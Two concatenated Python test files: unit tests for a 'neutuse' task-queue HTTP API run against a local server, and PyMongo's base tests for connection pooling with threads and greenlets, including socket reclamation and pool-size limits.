test.py
|
'''
This file tests the neutuse HTTP APIs.
If everything is fine, you should see 'OK' at the bottom of the screen.
'''
import unittest
import json
import threading
import time
import requests as rq
import neutuse
ADDR = '127.0.0.1:8080'
JSON_HEADER = {'Content-Type':'application/json'}
BASE_URL = 'http://'+ ADDR + '/api/v1/'
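# Notes on the API shape exercised below: a successful POST to /tasks echoes the task back as
# JSON with a server-assigned 'id' field (and a 'status' field), which the GET tests rely on.
# Hypothetical example response:
#   {"id": 1, "type": "dvid", "name": "skeletonize", "config": {"input": "test", "bodyid": 1}, ...}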
class TestNeutuseHTTPAPIV1(unittest.TestCase):
def test_post_tasks(self):
url = BASE_URL + 'tasks'
task = {
'type':'dvid',
'name':'skeletonize',
'description':'test',
'config':{'input':'test','bodyid':1},
'life_span':3600,
'max_tries':1,
'user':'test'
}
rv = rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
self.assertEqual(rv.status_code,200)
task = {
'type':'dvid',
'name':'skeletonize',
'config':{'input':'test','bodyid':1},
'wrong':'wrong'
}
rv = rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
self.assertEqual(rv.status_code,400)
task = {
'wrong':'dvid',
'name':'skeletonize',
'config':{'input':'test','bodyid':1}
}
rv = rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
self.assertEqual(rv.status_code,400)
task = {
'type':'dvid',
'name':'skeletonize',
'config': 'wrong'
}
rv = rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
self.assertEqual(rv.status_code,400)
task = {
'type':'dvid',
'config': 'wrong'
}
rv = rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
self.assertEqual(rv.status_code,400)
def test_get_tasks(self):
url = BASE_URL + 'tasks'
task = {
'type':'abc',
'name':'skeletonize',
'description':'test',
'config':{'input':'test','bodyid':1},
'life_span':300,
'max_tries':100,
'user':'test'
}
rv_task = rq.post(url, data=json.dumps(task), headers=JSON_HEADER).json()
rv = rq.get(url,params={'id':rv_task['id']})
self.assertEqual(rv.status_code,200)
self.assertEqual(len(rv.json()),1)
task = rv.json()[0]
for key in task:
self.assertEqual(task[key], rv_task[key])
rv = rq.get(url,params={'id':rv_task['id'],'name':'skeletonize'})
self.assertEqual(rv.status_code,200)
self.assertEqual(len(rv.json()),1)
task = rv.json()[0]
for key in task:
self.assertEqual(task[key], rv_task[key])
rv = rq.get(url,params={'ids':rv_task['id']})
self.assertEqual(rv.status_code,400)
rv = rq.get(url,params={'id':rv_task['id'],'name':'skeletonze'})
self.assertEqual(rv.status_code,400)
def test_get_task_by_id(self):
url = BASE_URL + 'tasks'
task = {
'type':'abc',
'name':'skeletonize',
'config':{'input':'test','bodyid':1},
}
rv_task = rq.post(url, data=json.dumps(task), headers=JSON_HEADER).json()
rv = rq.get(url+'/{}'.format(rv_task['id']))
self.assertEqual(rv.status_code,200)
task = rv.json()
for key in task:
self.assertEqual(task[key], rv_task[key])
rv = rq.get(url+'/{}'.format(101011123))
self.assertEqual(rv.status_code,400)
def test_get_task_property_by_id(self):
url = BASE_URL + 'tasks'
task = {
'type':'abc',
'name':'skeletonize',
'config':{'input':'test','bodyid':1},
}
rv_task = rq.post(url, data=json.dumps(task), headers=JSON_HEADER).json()
rv = rq.get(url+'/{}/config'.format(rv_task['id']))
self.assertEqual(rv.status_code,200)
config = rv.json()
self.assertEqual(task['config'],config)
rv = rq.get(url+'/{}/as'.format(rv_task['id']))
self.assertEqual(rv.status_code,400)
def test_top_k_tasks(self):
url = BASE_URL + 'tasks'
task = {
'type':'dvid',
'name':'skeletonize',
'config':{'input':'test','bodyid':1},
'priority':1000,
'description':'1'
}
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
task['priority'] = 1001
task['description'] ='2'
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
task['priority'] = 1001
task['description'] ='3'
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
task['priority'] = 9999
task['description'] ='4'
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
rv = rq.get(url+'/top/dvid/skeletonize/4')
self.assertEqual(rv.status_code,200)
self.assertEqual(len(rv.json()),4)
self.assertEqual(rv.json()[0]['description'],'4')
self.assertEqual(rv.json()[1]['description'],'2')
self.assertEqual(rv.json()[2]['description'],'3')
self.assertEqual(rv.json()[3]['description'],'1')
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
task['priority'] = 10001
task['description'] ='20'
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
        task['priority'] = 10001
task['description'] ='30'
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
task['priority'] = 99999
task['description'] ='40'
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
rv = rq.get(url+'/top/dvid/skeletonize/1')
self.assertEqual(len(rv.json()),1)
rv = rq.get(url+'/top/dvid1/skeletonize/1')
self.assertEqual(rv.status_code,400)
rv = rq.get(url+'/top/dvid/skeletonize2/1')
self.assertEqual(rv.status_code,400)
def test_post_task_status(self):
url = BASE_URL + 'tasks'
task = {
'type':'abc',
'name':'skeletonize',
'config':{'input':'test','bodyid':1},
}
rv_task = rq.post(url, data=json.dumps(task), headers=JSON_HEADER).json()
rv = rq.post(url+'/{}/status/processing'.format(rv_task['id']))
self.assertEqual(rv.status_code,200)
self.assertEqual(rv.json()['status'],'processing')
rv = rq.post(url+'/{}/status/failed'.format(rv_task['id']))
self.assertEqual(rv.status_code,200)
self.assertEqual(rv.json()['status'],'failed')
rv = rq.post(url+'/{}/status/done'.format(rv_task['id']))
self.assertEqual(rv.status_code,200)
self.assertEqual(rv.json()['status'],'done')
rv = rq.post(url+'/{}/status/processings'.format(rv_task['id']))
self.assertEqual(rv.status_code,400)
def test_post_task_comments(self):
url = BASE_URL + 'tasks'
task = {
'type':'abc',
'name':'skeletonize',
'config':{'input':'test','bodyid':1},
}
rv_task = rq.post(url, data=json.dumps(task), headers=JSON_HEADER).json()
rv = rq.get(url+'/{}/comments'.format(rv_task['id'])).json()
self.assertEqual(rv,[])
rq.post(url+'/{}/comments'.format(rv_task['id']), data='123', headers=JSON_HEADER)
rv = rq.get(url+'/{}/comments'.format(rv_task['id'])).json()
self.assertEqual(rv,['123'])
rq.post(url+'/{}/comments'.format(rv_task['id']), data='456', headers=JSON_HEADER)
rv = rq.get(url+'/{}/comments'.format(rv_task['id'])).json()
self.assertEqual(rv,['123','456'])
if __name__ == '__main__':
threading.Thread(target = neutuse.run_database, args=(ADDR, 'sqlite:{}.db'.format(time.time()))).start()
time.sleep(1)
unittest.main()
|
test_pooling_base.py
|
# Copyright 2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base classes to test built-in connection-pooling with threads or greenlets.
"""
import gc
import random
import socket
import sys
import thread
import threading
import time
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
import pymongo.pool
from pymongo.mongo_client import MongoClient
from pymongo.pool import Pool, NO_REQUEST, NO_SOCKET_YET, SocketInfo
from pymongo.errors import ConfigurationError, ConnectionFailure
from pymongo.errors import ExceededMaxWaiters
from test import version, host, port
from test.test_client import get_client
from test.utils import delay, is_mongos, one
N = 50
DB = "pymongo-pooling-tests"
if sys.version_info[0] >= 3:
from imp import reload
try:
import gevent
from gevent import Greenlet, monkey, hub
import gevent.coros, gevent.event
has_gevent = True
except ImportError:
has_gevent = False
def gc_collect_until_done(threads, timeout=60):
start = time.time()
running = list(threads)
while running:
assert (time.time() - start) < timeout, "Threads timed out"
for t in running:
t.thread.join(0.1)
if not t.alive:
running.remove(t)
gc.collect()
class MongoThread(object):
"""A thread, or a greenlet, that uses a MongoClient"""
def __init__(self, test_case):
self.use_greenlets = test_case.use_greenlets
self.client = test_case.c
self.db = self.client[DB]
self.ut = test_case
self.passed = False
def start(self):
if self.use_greenlets:
# A Gevent extended Greenlet
self.thread = Greenlet(self.run)
else:
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True) # Don't hang whole test if thread hangs
self.thread.start()
@property
def alive(self):
if self.use_greenlets:
return not self.thread.dead
else:
return self.thread.isAlive()
def join(self):
self.thread.join(10)
if self.use_greenlets:
msg = "Greenlet timeout"
else:
msg = "Thread timeout"
assert not self.alive, msg
self.thread = None
def run(self):
self.run_mongo_thread()
# No exceptions thrown
self.passed = True
def run_mongo_thread(self):
raise NotImplementedError()
class SaveAndFind(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
rand = random.randint(0, N)
_id = self.db.sf.save({"x": rand})
self.ut.assertEqual(rand, self.db.sf.find_one(_id)["x"])
class Unique(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
self.client.start_request()
self.db.unique.insert({}) # no error
self.client.end_request()
class NonUnique(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
self.client.start_request()
self.db.unique.insert({"_id": "jesse"}, w=0)
self.ut.assertNotEqual(None, self.db.error())
self.client.end_request()
class Disconnect(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
self.client.disconnect()
class NoRequest(MongoThread):
def run_mongo_thread(self):
self.client.start_request()
errors = 0
for _ in xrange(N):
self.db.unique.insert({"_id": "jesse"}, w=0)
if not self.db.error():
errors += 1
self.client.end_request()
self.ut.assertEqual(0, errors)
def run_cases(ut, cases):
threads = []
nruns = 10
if (
ut.use_greenlets and sys.platform == 'darwin'
and gevent.version_info[0] < 1
):
# Gevent 0.13.6 bug on Mac, Greenlet.join() hangs if more than
# about 35 Greenlets share a MongoClient. Apparently fixed in
# recent Gevent development.
nruns = 5
for case in cases:
for i in range(nruns):
t = case(ut)
t.start()
threads.append(t)
for t in threads:
t.join()
for t in threads:
assert t.passed, "%s.run_mongo_thread() threw an exception" % repr(t)
class OneOp(MongoThread):
def __init__(self, ut):
super(OneOp, self).__init__(ut)
def run_mongo_thread(self):
pool = self.client._MongoClient__pool
assert len(pool.sockets) == 1, "Expected 1 socket, found %d" % (
len(pool.sockets)
)
sock_info = one(pool.sockets)
self.client.start_request()
# start_request() hasn't yet moved the socket from the general pool into
# the request
assert len(pool.sockets) == 1
assert one(pool.sockets) == sock_info
self.client[DB].test.find_one()
# find_one() causes the socket to be used in the request, so now it's
# bound to this thread
assert len(pool.sockets) == 0
assert pool._get_request_state() == sock_info
self.client.end_request()
# The socket is back in the pool
assert len(pool.sockets) == 1
assert one(pool.sockets) == sock_info
class CreateAndReleaseSocket(MongoThread):
"""A thread or greenlet that acquires a socket, waits for all other threads
    to reach a rendezvous point, then terminates.
"""
class Rendezvous(object):
def __init__(self, nthreads, use_greenlets):
self.nthreads = nthreads
self.nthreads_run = 0
self.use_greenlets = use_greenlets
if use_greenlets:
self.lock = gevent.coros.RLock()
else:
self.lock = threading.Lock()
self.reset_ready()
def reset_ready(self):
if self.use_greenlets:
self.ready = gevent.event.Event()
else:
self.ready = threading.Event()
def __init__(self, ut, client, start_request, end_request, rendezvous):
super(CreateAndReleaseSocket, self).__init__(ut)
self.client = client
self.start_request = start_request
self.end_request = end_request
self.rendezvous = rendezvous
def run_mongo_thread(self):
# Do an operation that requires a socket.
# test_max_pool_size uses this to spin up lots of threads requiring
# lots of simultaneous connections, to ensure that Pool obeys its
# max_size configuration and closes extra sockets as they're returned.
for i in range(self.start_request):
self.client.start_request()
# Use a socket
self.client[DB].test.find_one()
# Don't finish until all threads reach this point
r = self.rendezvous
r.lock.acquire()
r.nthreads_run += 1
if r.nthreads_run == r.nthreads:
# Everyone's here, let them finish
r.ready.set()
r.lock.release()
else:
r.lock.release()
r.ready.wait(2) # Wait two seconds
assert r.ready.isSet(), "Rendezvous timed out"
for i in range(self.end_request):
self.client.end_request()
class CreateAndReleaseSocketNoRendezvous(MongoThread):
"""A thread or greenlet that acquires a socket and terminates without
    waiting for other threads to reach a rendezvous point.
"""
class Rendezvous(object):
def __init__(self, nthreads, use_greenlets):
self.nthreads = nthreads
self.nthreads_run = 0
if use_greenlets:
self.lock = gevent.coros.RLock()
self.ready = gevent.event.Event()
else:
self.lock = threading.Lock()
self.ready = threading.Event()
def __init__(self, ut, client, start_request, end_request):
super(CreateAndReleaseSocketNoRendezvous, self).__init__(ut)
self.client = client
self.start_request = start_request
self.end_request = end_request
def run_mongo_thread(self):
# Do an operation that requires a socket.
# test_max_pool_size uses this to spin up lots of threads requiring
# lots of simultaneous connections, to ensure that Pool obeys its
# max_size configuration and closes extra sockets as they're returned.
for i in range(self.start_request):
self.client.start_request()
# Use a socket
self.client[DB].test.find_one()
for i in range(self.end_request):
self.client.end_request()
class _TestPoolingBase(object):
"""Base class for all client-pool tests. Doesn't inherit from
unittest.TestCase, and its name is prefixed with "_" to avoid being
run by nose. Real tests double-inherit from this base and from TestCase.
"""
use_greenlets = False
def setUp(self):
if self.use_greenlets:
if not has_gevent:
raise SkipTest("Gevent not installed")
# Note we don't do patch_thread() or patch_all() - we're
# testing here that patch_thread() is unnecessary for
# the client pool to work properly.
monkey.patch_socket()
self.c = self.get_client(auto_start_request=False)
# reset the db
db = self.c[DB]
db.unique.drop()
db.test.drop()
db.unique.insert({"_id": "jesse"})
db.test.insert([{} for i in range(10)])
def tearDown(self):
self.c.close()
if self.use_greenlets:
# Undo patch
reload(socket)
def get_client(self, *args, **kwargs):
opts = kwargs.copy()
opts['use_greenlets'] = self.use_greenlets
return get_client(*args, **opts)
def get_pool(self, *args, **kwargs):
kwargs['use_greenlets'] = self.use_greenlets
return Pool(*args, **kwargs)
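    # Note: Pool (and get_pool) can also be called positionally as
    # Pool(pair, max_size, net_timeout, conn_timeout, use_ssl); e.g.
    # self.get_pool((host, port), 10, None, None, False) builds a non-SSL pool capped at
    # 10 sockets. The keyword form of the same call appears in test_request() below.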
def sleep(self, seconds):
if self.use_greenlets:
gevent.sleep(seconds)
else:
time.sleep(seconds)
def assert_no_request(self):
self.assertEqual(
NO_REQUEST, self.c._MongoClient__pool._get_request_state()
)
def assert_request_without_socket(self):
self.assertEqual(
NO_SOCKET_YET, self.c._MongoClient__pool._get_request_state()
)
def assert_request_with_socket(self):
self.assertTrue(isinstance(
self.c._MongoClient__pool._get_request_state(), SocketInfo
))
def assert_pool_size(self, pool_size):
self.assertEqual(
pool_size, len(self.c._MongoClient__pool.sockets)
)
class _TestPooling(_TestPoolingBase):
"""Basic pool tests, to be run both with threads and with greenlets."""
def test_max_pool_size_validation(self):
self.assertRaises(
ConfigurationError, MongoClient, host=host, port=port,
max_pool_size=-1
)
self.assertRaises(
ConfigurationError, MongoClient, host=host, port=port,
max_pool_size='foo'
)
c = MongoClient(host=host, port=port, max_pool_size=100)
self.assertEqual(c.max_pool_size, 100)
def test_no_disconnect(self):
run_cases(self, [NoRequest, NonUnique, Unique, SaveAndFind])
def test_simple_disconnect(self):
# MongoClient just created, expect 1 free socket
self.assert_pool_size(1)
self.assert_no_request()
self.c.start_request()
self.assert_request_without_socket()
cursor = self.c[DB].stuff.find()
# Cursor hasn't actually caused a request yet, so there's still 1 free
# socket.
self.assert_pool_size(1)
self.assert_request_without_socket()
# Actually make a request to server, triggering a socket to be
# allocated to the request
list(cursor)
self.assert_pool_size(0)
self.assert_request_with_socket()
# Pool returns to its original state
self.c.end_request()
self.assert_no_request()
self.assert_pool_size(1)
self.c.disconnect()
self.assert_pool_size(0)
self.assert_no_request()
def test_disconnect(self):
run_cases(self, [SaveAndFind, Disconnect, Unique])
def test_independent_pools(self):
# Test for regression of very early PyMongo bug: separate pools shared
# state.
p = self.get_pool((host, port), 10, None, None, False)
self.c.start_request()
self.c.pymongo_test.test.find_one()
self.assertEqual(set(), p.sockets)
self.c.end_request()
self.assert_pool_size(1)
self.assertEqual(set(), p.sockets)
def test_dependent_pools(self):
self.assert_pool_size(1)
self.c.start_request()
self.assert_request_without_socket()
self.c.pymongo_test.test.find_one()
self.assert_request_with_socket()
self.assert_pool_size(0)
self.c.end_request()
self.assert_pool_size(1)
t = OneOp(self)
t.start()
t.join()
self.assertTrue(t.passed, "OneOp.run() threw exception")
self.assert_pool_size(1)
self.c.pymongo_test.test.find_one()
self.assert_pool_size(1)
def test_multiple_connections(self):
a = self.get_client(auto_start_request=False)
b = self.get_client(auto_start_request=False)
self.assertEqual(1, len(a._MongoClient__pool.sockets))
self.assertEqual(1, len(b._MongoClient__pool.sockets))
a.start_request()
a.pymongo_test.test.find_one()
self.assertEqual(0, len(a._MongoClient__pool.sockets))
a.end_request()
self.assertEqual(1, len(a._MongoClient__pool.sockets))
self.assertEqual(1, len(b._MongoClient__pool.sockets))
a_sock = one(a._MongoClient__pool.sockets)
b.end_request()
self.assertEqual(1, len(a._MongoClient__pool.sockets))
self.assertEqual(1, len(b._MongoClient__pool.sockets))
b.start_request()
b.pymongo_test.test.find_one()
self.assertEqual(1, len(a._MongoClient__pool.sockets))
self.assertEqual(0, len(b._MongoClient__pool.sockets))
b.end_request()
b_sock = one(b._MongoClient__pool.sockets)
b.pymongo_test.test.find_one()
a.pymongo_test.test.find_one()
self.assertEqual(b_sock,
b._MongoClient__pool.get_socket((b.host, b.port)))
self.assertEqual(a_sock,
a._MongoClient__pool.get_socket((a.host, a.port)))
a_sock.close()
b_sock.close()
def test_request(self):
# Check that Pool gives two different sockets in two calls to
# get_socket() -- doesn't automatically put us in a request any more
cx_pool = self.get_pool(
pair=(host,port),
max_size=10,
net_timeout=1000,
conn_timeout=1000,
use_ssl=False
)
sock0 = cx_pool.get_socket()
sock1 = cx_pool.get_socket()
self.assertNotEqual(sock0, sock1)
# Now in a request, we'll get the same socket both times
cx_pool.start_request()
sock2 = cx_pool.get_socket()
sock3 = cx_pool.get_socket()
self.assertEqual(sock2, sock3)
# Pool didn't keep reference to sock0 or sock1; sock2 and 3 are new
self.assertNotEqual(sock0, sock2)
self.assertNotEqual(sock1, sock2)
# Return the request sock to pool
cx_pool.end_request()
sock4 = cx_pool.get_socket()
sock5 = cx_pool.get_socket()
# Not in a request any more, we get different sockets
self.assertNotEqual(sock4, sock5)
# end_request() returned sock2 to pool
self.assertEqual(sock4, sock2)
for s in [sock0, sock1, sock2, sock3, sock4, sock5]:
s.close()
def test_reset_and_request(self):
# reset() is called after a fork, or after a socket error. Ensure that
# a new request is begun if a request was in progress when the reset()
# occurred, otherwise no request is begun.
p = self.get_pool((host, port), 10, None, None, False)
self.assertFalse(p.in_request())
p.start_request()
self.assertTrue(p.in_request())
p.reset()
self.assertTrue(p.in_request())
p.end_request()
self.assertFalse(p.in_request())
p.reset()
self.assertFalse(p.in_request())
def test_pool_reuses_open_socket(self):
# Test Pool's _check_closed() method doesn't close a healthy socket
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool._check_interval_seconds = 0 # Always check.
sock_info = cx_pool.get_socket()
cx_pool.maybe_return_socket(sock_info)
new_sock_info = cx_pool.get_socket()
self.assertEqual(sock_info, new_sock_info)
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_socket(self):
# Test that Pool removes dead socket and the socket doesn't return
# itself PYTHON-344
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool._check_interval_seconds = 0 # Always check.
sock_info = cx_pool.get_socket()
# Simulate a closed socket without telling the SocketInfo it's closed
sock_info.sock.close()
self.assertTrue(pymongo.pool._closed(sock_info.sock))
cx_pool.maybe_return_socket(sock_info)
new_sock_info = cx_pool.get_socket()
self.assertEqual(0, len(cx_pool.sockets))
self.assertNotEqual(sock_info, new_sock_info)
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_request_socket_after_check(self):
# Test that Pool keeps request going even if a socket dies in request
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool._check_interval_seconds = 0 # Always check.
cx_pool.start_request()
# Get the request socket
sock_info = cx_pool.get_socket()
self.assertEqual(0, len(cx_pool.sockets))
self.assertEqual(sock_info, cx_pool._get_request_state())
sock_info.sock.close()
cx_pool.maybe_return_socket(sock_info)
# Although the request socket died, we're still in a request with a
# new socket
new_sock_info = cx_pool.get_socket()
self.assertTrue(cx_pool.in_request())
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
self.assertEqual(0, len(cx_pool.sockets))
cx_pool.end_request()
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_request_socket(self):
# Test that Pool keeps request going even if a socket dies in request
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool.start_request()
# Get the request socket
sock_info = cx_pool.get_socket()
self.assertEqual(0, len(cx_pool.sockets))
self.assertEqual(sock_info, cx_pool._get_request_state())
# Unlike in test_pool_removes_dead_request_socket_after_check, we
# set sock_info.closed and *don't* wait for it to be checked.
sock_info.close()
cx_pool.maybe_return_socket(sock_info)
# Although the request socket died, we're still in a request with a
# new socket
new_sock_info = cx_pool.get_socket()
self.assertTrue(cx_pool.in_request())
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
self.assertEqual(0, len(cx_pool.sockets))
cx_pool.end_request()
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_socket_after_request(self):
# Test that Pool handles a socket dying that *used* to be the request
# socket.
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool._check_interval_seconds = 0 # Always check.
cx_pool.start_request()
# Get the request socket
sock_info = cx_pool.get_socket()
self.assertEqual(sock_info, cx_pool._get_request_state())
cx_pool.maybe_return_socket(sock_info)
# End request
cx_pool.end_request()
self.assertEqual(1, len(cx_pool.sockets))
# Kill old request socket
sock_info.sock.close()
# Dead socket detected and removed
new_sock_info = cx_pool.get_socket()
self.assertFalse(cx_pool.in_request())
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(0, len(cx_pool.sockets))
self.assertFalse(pymongo.pool._closed(new_sock_info.sock))
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(1, len(cx_pool.sockets))
def test_dead_request_socket_with_max_size(self):
# When a pool replaces a dead request socket, the semaphore it uses
# to enforce max_size should remain unaffected.
cx_pool = self.get_pool(
(host, port), 1, None, None, False, wait_queue_timeout=1)
cx_pool._check_interval_seconds = 0 # Always check.
cx_pool.start_request()
# Get and close the request socket.
request_sock_info = cx_pool.get_socket()
request_sock_info.sock.close()
cx_pool.maybe_return_socket(request_sock_info)
# Detects closed socket and creates new one, semaphore value still 0.
request_sock_info_2 = cx_pool.get_socket()
self.assertNotEqual(request_sock_info, request_sock_info_2)
cx_pool.maybe_return_socket(request_sock_info_2)
cx_pool.end_request()
# Semaphore value now 1; we can get a socket.
sock_info = cx_pool.get_socket()
# Clean up.
cx_pool.maybe_return_socket(sock_info)
def test_socket_reclamation(self):
if sys.platform.startswith('java'):
raise SkipTest("Jython can't do socket reclamation")
# Check that if a thread starts a request and dies without ending
# the request, that the socket is reclaimed into the pool.
cx_pool = self.get_pool(
pair=(host,port),
max_size=10,
net_timeout=1000,
conn_timeout=1000,
use_ssl=False,
)
self.assertEqual(0, len(cx_pool.sockets))
lock = None
the_sock = [None]
def leak_request():
self.assertEqual(NO_REQUEST, cx_pool._get_request_state())
cx_pool.start_request()
self.assertEqual(NO_SOCKET_YET, cx_pool._get_request_state())
sock_info = cx_pool.get_socket()
self.assertEqual(sock_info, cx_pool._get_request_state())
the_sock[0] = id(sock_info.sock)
cx_pool.maybe_return_socket(sock_info)
if not self.use_greenlets:
lock.release()
if self.use_greenlets:
g = Greenlet(leak_request)
g.start()
g.join(1)
self.assertTrue(g.ready(), "Greenlet is hung")
# In Gevent after 0.13.8, join() returns before the Greenlet.link
# callback fires. Give it a moment to reclaim the socket.
gevent.sleep(0.1)
else:
lock = thread.allocate_lock()
lock.acquire()
# Start a thread WITHOUT a threading.Thread - important to test that
# Pool can deal with primitive threads.
thread.start_new_thread(leak_request, ())
# Join thread
acquired = lock.acquire()
self.assertTrue(acquired, "Thread is hung")
# Make sure thread is really gone
time.sleep(1)
if 'PyPy' in sys.version:
gc.collect()
# Access the thread local from the main thread to trigger the
# ThreadVigil's delete callback, returning the request socket to
# the pool.
# In Python 2.7.0 and lesser, a dead thread's locals are deleted
# and those locals' weakref callbacks are fired only when another
# thread accesses the locals and finds the thread state is stale,
# see http://bugs.python.org/issue1868. Accessing the thread
# local from the main thread is a necessary part of this test, and
# realistic: in a multithreaded web server a new thread will access
# Pool._ident._local soon after an old thread has died.
cx_pool._ident.get()
# Pool reclaimed the socket
self.assertEqual(1, len(cx_pool.sockets))
self.assertEqual(the_sock[0], id(one(cx_pool.sockets).sock))
self.assertEqual(0, len(cx_pool._tid_to_sock))
class _TestMaxPoolSize(_TestPoolingBase):
"""Test that connection pool keeps proper number of idle sockets open,
no matter how start/end_request are called. To be run both with threads and
with greenlets.
"""
def _test_max_pool_size(
self, start_request, end_request, max_pool_size=4, nthreads=10):
"""Start `nthreads` threads. Each calls start_request `start_request`
times, then find_one and waits at a barrier; once all reach the barrier
each calls end_request `end_request` times. The test asserts that the
pool ends with min(max_pool_size, nthreads) sockets or, if
start_request wasn't called, at least one socket.
This tests both max_pool_size enforcement and that leaked request
sockets are eventually returned to the pool when their threads end.
You may need to increase ulimit -n on Mac.
If you increase nthreads over about 35, note a
Gevent 0.13.6 bug on Mac: Greenlet.join() hangs if more than
about 35 Greenlets share a MongoClient. Apparently fixed in
recent Gevent development.
"""
if start_request:
if max_pool_size is not None and max_pool_size < nthreads:
raise AssertionError("Deadlock")
c = self.get_client(
max_pool_size=max_pool_size, auto_start_request=False)
rendezvous = CreateAndReleaseSocket.Rendezvous(
nthreads, self.use_greenlets)
threads = []
for i in range(nthreads):
t = CreateAndReleaseSocket(
self, c, start_request, end_request, rendezvous)
threads.append(t)
for t in threads:
t.start()
if 'PyPy' in sys.version:
# With PyPy we need to kick off the gc whenever the threads hit the
# rendezvous since nthreads > max_pool_size.
gc_collect_until_done(threads)
else:
for t in threads:
t.join()
# join() returns before the thread state is cleared; give it time.
self.sleep(1)
for t in threads:
self.assertTrue(t.passed)
# Socket-reclamation doesn't work in Jython
if not sys.platform.startswith('java'):
cx_pool = c._MongoClient__pool
# Socket-reclamation depends on timely garbage-collection
if 'PyPy' in sys.version:
gc.collect()
if self.use_greenlets:
# Wait for Greenlet.link() callbacks to execute
the_hub = hub.get_hub()
if hasattr(the_hub, 'join'):
# Gevent 1.0
the_hub.join()
else:
# Gevent 0.13 and less
the_hub.shutdown()
if start_request:
# Trigger final cleanup in Python <= 2.7.0.
cx_pool._ident.get()
expected_idle = min(max_pool_size, nthreads)
message = (
'%d idle sockets (expected %d) and %d request sockets'
' (expected 0)' % (
len(cx_pool.sockets), expected_idle,
len(cx_pool._tid_to_sock)))
self.assertEqual(
expected_idle, len(cx_pool.sockets), message)
else:
# Without calling start_request(), threads can safely share
# sockets; the number running concurrently, and hence the
# number of sockets needed, is between 1 and 10, depending
# on thread-scheduling.
self.assertTrue(len(cx_pool.sockets) >= 1)
# thread.join completes slightly *before* thread locals are
# cleaned up, so wait up to 5 seconds for them.
self.sleep(0.1)
cx_pool._ident.get()
start = time.time()
while (
not cx_pool.sockets
and cx_pool._socket_semaphore.counter < max_pool_size
and (time.time() - start) < 5
):
self.sleep(0.1)
cx_pool._ident.get()
if max_pool_size is not None:
self.assertEqual(
max_pool_size,
cx_pool._socket_semaphore.counter)
self.assertEqual(0, len(cx_pool._tid_to_sock))
def _test_max_pool_size_no_rendezvous(self, start_request, end_request):
max_pool_size = 5
c = self.get_client(
max_pool_size=max_pool_size, auto_start_request=False)
# If you increase nthreads over about 35, note a
# Gevent 0.13.6 bug on Mac, Greenlet.join() hangs if more than
# about 35 Greenlets share a MongoClient. Apparently fixed in
# recent Gevent development.
# On the other hand, nthreads had better be much larger than
# max_pool_size to ensure that max_pool_size sockets are actually
# required at some point in this test's execution.
nthreads = 30
if (sys.platform.startswith('java')
and start_request > end_request
and nthreads > max_pool_size):
# Since Jython can't reclaim the socket and release the semaphore
# after a thread leaks a request, we'll exhaust the semaphore and
# deadlock.
raise SkipTest("Jython can't do socket reclamation")
threads = []
for i in range(nthreads):
t = CreateAndReleaseSocketNoRendezvous(
self, c, start_request, end_request)
threads.append(t)
for t in threads:
t.start()
if 'PyPy' in sys.version:
# With PyPy we need to kick off the gc whenever the threads hit the
# rendezvous since nthreads > max_pool_size.
gc_collect_until_done(threads)
else:
for t in threads:
t.join()
for t in threads:
self.assertTrue(t.passed)
cx_pool = c._MongoClient__pool
# Socket-reclamation depends on timely garbage-collection
if 'PyPy' in sys.version:
gc.collect()
if self.use_greenlets:
# Wait for Greenlet.link() callbacks to execute
the_hub = hub.get_hub()
if hasattr(the_hub, 'join'):
# Gevent 1.0
the_hub.join()
else:
# Gevent 0.13 and less
the_hub.shutdown()
# thread.join completes slightly *before* thread locals are
# cleaned up, so wait up to 5 seconds for them.
self.sleep(0.1)
cx_pool._ident.get()
start = time.time()
while (
not cx_pool.sockets
and cx_pool._socket_semaphore.counter < max_pool_size
and (time.time() - start) < 5
):
self.sleep(0.1)
cx_pool._ident.get()
self.assertTrue(len(cx_pool.sockets) >= 1)
self.assertEqual(max_pool_size, cx_pool._socket_semaphore.counter)
def test_max_pool_size(self):
self._test_max_pool_size(
start_request=0, end_request=0, nthreads=10, max_pool_size=4)
